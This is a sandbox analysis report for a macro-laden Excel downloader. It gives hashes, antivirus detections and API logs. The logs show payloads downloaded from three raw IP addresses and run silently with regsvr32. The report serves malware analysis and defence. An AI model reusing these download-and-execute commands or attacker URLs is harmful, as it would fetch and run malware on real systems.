Summary | ZeroBOX

1796250310-10042021.xls

VBA_macro Generic Malware Downloader MSOffice File
Category FILE
Machine s1_win7_x6403_us
Started Oct. 5, 2021, 4:52 p.m.
Completed Oct. 5, 2021, 4:54 p.m.
Size 129.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:17:20 2015, Last Saved Time/Date: Mon Oct 4 08:34:12 2021, Security: 0
MD5 1f4a448f535f2a3657dfef39beb4a662
SHA256 0a8b0b423e864ae0c19cbe56b135d804b91516bb9b633d889c315c757bfd3930
CRC32 5DC7238C
ssdeep 3072:Sk3hOdsylKlgxopeiBNhZFGzE+cL2kdAxc6YehWfGdtUHKGDbpmsii/+u6ssC06+:Sk3hOdsylKlgxopeiBNhZF+E+W2kdAxX
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]
  • Generic_Malware_Zero - Generic Malware
  • Microsoft_Office_File_Zero - Microsoft Office File
  • Microsoft_Office_File_Downloader_Zero - Microsoft Office File Downloader

Name Response Post-Analysis Lookup
No hosts contacted.

IP Address     Status  Action
188.119.113.3  Active  Moloch
190.14.37.165  Active  Moloch
5.196.247.11   Active  Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

suspicious_features Connection to IP address
suspicious_request GET http://190.14.37.165/44474.7033944444.dat
suspicious_features Connection to IP address
suspicious_request GET http://5.196.247.11/44474.7033944444.dat
request GET http://190.14.37.165/44474.7033944444.dat
request GET http://5.196.247.11/44474.7033944444.dat
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bf98000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bb8e000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07dc7000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07dc7000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x066b4000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x066b4000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x066b4000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x066b4000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6af42000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0
cmdline regsvr32 -silent ..\Celod.wac2
cmdline regsvr32 -silent ..\Celod.wac
cmdline regsvr32 -silent ..\Celod.wac1
DrWeb Exploit.Siggen3.20971
Cyren X97M/Downldr.TS.gen!Eldorado
ESET-NOD32 VBA/TrojanDownloader.Agent.WSI
TrendMicro-HouseCall TROJ_FRS.VSNTJ421
Kaspersky UDS:Trojan-Downloader.MSOffice.SLoad.gen
McAfee X97M/Downloader.lm
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef60000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0
host 188.119.113.3
host 190.14.37.165
host 5.196.247.11
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: http://190.14.37.165/44474.7033944444.dat
stack_pivoted: 0
filepath_r: ..\Celod.wac
filepath: C:\Users\test22\Celod.wac
return: 2148270088 repeated: 0

URLDownloadToFileW

url: http://5.196.247.11/44474.7033944444.dat
stack_pivoted: 0
filepath_r: ..\Celod.wac1
filepath: C:\Users\test22\Celod.wac1
return: 2148270088 repeated: 0

URLDownloadToFileW

url: http://188.119.113.3/44474.7033944444.dat
stack_pivoted: 0
filepath_r: ..\Celod.wac2
filepath: C:\Users\test22\Celod.wac2
return: 2148270085 repeated: 0
parent_process excel.exe
martian_process regsvr32 -silent ..\Celod.wac2
parent_process excel.exe
martian_process regsvr32 -silent ..\Celod.wac
parent_process excel.exe
martian_process regsvr32 -silent ..\Celod.wac1
dead_host 188.119.113.3:80